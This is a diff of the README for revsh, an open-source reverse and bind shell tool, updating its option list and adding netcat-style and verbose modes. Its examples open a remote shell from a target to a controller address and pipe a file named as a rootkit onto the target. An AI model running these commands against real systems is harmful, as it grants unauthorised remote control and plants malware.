emptymonkey/revsh/README.md

 ## Usage ##

-    empty@monkey:~$ revsh -h
+	empty@monkey:~/devel/code/revsh$ ./revsh -h

-    usage: revsh [-c [-a] [-s SHELL] [-d KEYS_DIR] [-f RC_FILE]] [-b [-k]] [-t SEC] [-r SEC1[,SEC2]] [ADDRESS:PORT]
+	usage:  revsh [-c [-a] [-s SHELL] [-d KEYS_DIR] [-f RC_FILE]] [-t SEC] [-r SEC1[,SEC2]] [-b [-k]] [-n] [-v] [ADDRESS:PORT]

 		-c            Run in controller mode.
 (Default is target mode.)
 		-a            Enable Anonymous Diffie-Hellman mode.
 (Default is "!ADH:DHE-RSA-AES256-SHA".)
 		-s SHELL      Invoke SHELL as the remote shell.
 (Default is "/bin/bash".)
 		-d KEYS_DIR   Reference the keys in an alternate directory.
-(Default is ".revsh/keys/".)
+(Default is "~/.revsh/keys/".)
 		-f RC_FILE    Reference an alternate rc file.
-(Default is ".revsh/rc".)
+(Default is "~/.revsh/rc".)
 		-t SEC        Set the connection timeout to SEC seconds.
 (Default is "3600".)
 		-r SEC1,SEC2  Set the retry time to be SEC1 seconds, or      (Default is "600,1200".) to be random in the range from SEC1 to SEC2.
 		-b            Start in bind shell mode.
 (Default is reverse shell mode.)
 		-k            Start the bind shell in keep-alive mode.
 (Ignored in reverse shell mode.)
+		-n            Netcat style data broker.
+No tty.
+(Default is interactive w/remote tty.)
+		              Non-interactive.
+Useful for copying files.
+		-v            Verbose output.
 		-h            Print this help.
 		ADDRESS:PORT  The address and port of the listening socket.
 (Default is "127.0.0.1:9999".)

 		Notes:
 		  * The -b flag must be invoked on both the control and target hosts to enable bind shell mode.
 		  * Bind shell mode can also be enabled by invoking the binary as 'bindsh' instead of 'revsh'.

-    Example:
+	    * Verbose output may mix with data if -v is used together with -n.

+		Interactive example:
 		  local controller host:  revsh -c 192.168.0.42:443
 		  remote target host:     revsh 192.168.0.42:443

+		Non-interactive example:
+		  local controller host:  cat ~/bin/rootkit | revsh -n -c 192.168.0.42:443 remote target host:     revsh 192.168.0.42:443 > ./totally_not_a_rootkit

 	## Example ##

 First, setup the local host to be the control host: